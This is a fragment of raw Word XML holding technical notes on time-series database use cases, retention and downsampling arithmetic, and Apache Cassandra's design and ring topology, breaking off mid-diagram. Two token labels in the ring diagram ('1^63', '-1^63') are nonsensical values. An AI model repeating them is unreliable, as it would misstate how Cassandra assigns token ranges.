    <w:p w14:paraId="54DB7C4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>TSM files on disk (compressed, sorted, immutable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C6972" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Compaction merges TSM files (similar to LSM compaction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5FB3A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Retention policies: automatic deletion of old data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3BE7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Time Series Database Use Cases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13"/>
        <w:gridCol w:w="2345"/>
        <w:gridCol w:w="2101"/>
        <w:gridCol w:w="2491"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="715ACF2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CF606E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case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B33D71" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data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48FE07" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scale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46348E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Database Choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="49156F0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CAD5E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Infrastructure monitoring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7CCFC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>CPU, memory, disk metrics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3B6BAA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>100K–1M series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9E5452" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Prometheus + Thanos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="38590EB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525ECD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Application performance (APM)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0BBBD6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Latency, error rates, throughput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31C0A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>1M–10M series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B8C48C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Datadog, ClickHouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="66CB5F3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95825A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>IoT sensor data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B69FAC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Temperature, pressure, GPS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184F52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>10M–100M devices × N metrics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A7BB5B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>InfluxDB, TimescaleDB, QuestDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5BC0759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115E16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Financial market data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532AEF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Stock prices, trades, order book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A314D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Millions of ticks/sec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62C231" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>QuestDB, kdb+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="33F4A88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6D0180" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Energy/utilities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DF2979" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Smart meter readings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46D39D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Millions of meters × every 15 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30E603" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>TimescaleDB, InfluxDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2EC2672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F1252B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Network monitoring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2BC752" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Packet counts, bandwidth, errors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8A99CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Millions of interfaces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3A9DBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>ClickHouse, VictoriaMetrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72FD0B6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Retention, Downsampling, and Compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AC4BE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7FD89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Retention strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF641EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Raw data (10-second resolution): keep 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244BA359" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  1-minute aggregation: keep 30 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6520C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1-hour aggregation: keep 1 year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47463920" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1-day aggregation: keep 5 years</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A6540" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="65DB4647" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>As data ages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2823FFB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Reduce resolution (aggregate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0815D4DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Increase compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489403C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Move to cheaper storage (SSD → HDD → object storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71615C1A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Eventually delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1752D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7CD21CFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Example storage savings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AEB455" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Raw (7 days):    100M points/day × 7 × 2 bytes = 1.4 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048F122" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1-min (30 days): 100M/6 = 16.7M points/day × 30 × 2 bytes = 1 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09574713" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1-hour (1 year): 100M/360 = 278K points/day × 365 × 2 bytes = 200 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E4D56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Total: ~2.6 GB (vs. 73 GB if all raw data kept for 1 year)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9D59D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="4DEA3833">
          <v:rect id="_x0000_i5906" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D84E2FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 2: Apache Cassandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0506F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Cassandra Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8D94B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Apache Cassandra is a distributed, wide-column NoSQL database designed for high availability and linear scalability, with no single point of failure. It's optimized for write-heavy workloads and multi-datacenter replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4E87D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Design philosophy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B7DFE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D144D66" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cassandra prioritizes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9FE4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Availability (always writable, even during partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD84F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Partition tolerance (survives network splits, node failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247221DD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Write performance (append-only, no read-before-write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989EEFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ✓ Linear scalability (add nodes → proportional capacity increase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA1E8E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ✓ Multi-datacenter (built-in cross-region replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70B7F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="084E549A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cassandra sacrifices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40105191" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> Strong consistency (eventual by default, tunable per-query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D15F54D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> Ad-hoc queries (must design tables for specific query patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E706BB4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> JOINs (no relational joins </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> denormalize everything)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0C557" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> Transactions (limited </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> lightweight transactions only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF5220" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> Read efficiency for arbitrary queries (optimized for known access patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE8652" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where Cassandra came from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673B275" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9214F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Google BigTable (2006): Column-family storage model, LSM-Tree storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123AEEC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Amazon Dynamo (2007): Consistent hashing, leaderless replication, tunable consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E6C764" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="257C40A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cassandra = BigTable's data model + Dynamo's distribution model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC88A0D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Created at Facebook (2008), open-sourced, now Apache project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64F095" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Cassandra Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E787E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Ring Topology (Peer-to-Peer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521156FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42D9E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        ┌────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADB939" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   ┌────│   Node A   │────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A79EF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   │    │Token: -2^63 │    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D895838" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   │    └────────────┘    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A3FEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">   │                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794329EE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌──</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC9091" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>│   Node F   │    │   Node B   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732BCF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│Token: 1^63 │    │Token: -1^63│</w:t>
      </w:r>
    </w:p>
